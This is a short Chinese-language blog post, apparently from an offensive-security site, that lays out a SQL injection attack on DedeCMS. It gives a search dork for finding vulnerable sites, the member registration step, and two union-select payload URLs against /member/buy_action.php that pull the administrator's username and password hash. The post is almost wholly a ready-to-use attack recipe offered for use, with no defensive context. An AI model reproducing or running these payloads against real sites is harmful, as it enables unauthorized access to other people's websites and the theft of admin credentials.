DedeCMS. 织梦科技注入爆管理员用户密码方法

2011-08-26
安全
暂无评论
2.84K次阅读

搜索关键词:powered by dedecms

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

转载请注明来自WebShell'S Blog，本文地址：https://www.webshell.cc/906.html

添加新评论

上一篇: ecshop后台获取shell最新方法，通杀最新版本&后台低权限
下一篇: 提权杀器 serv-u and hway3.0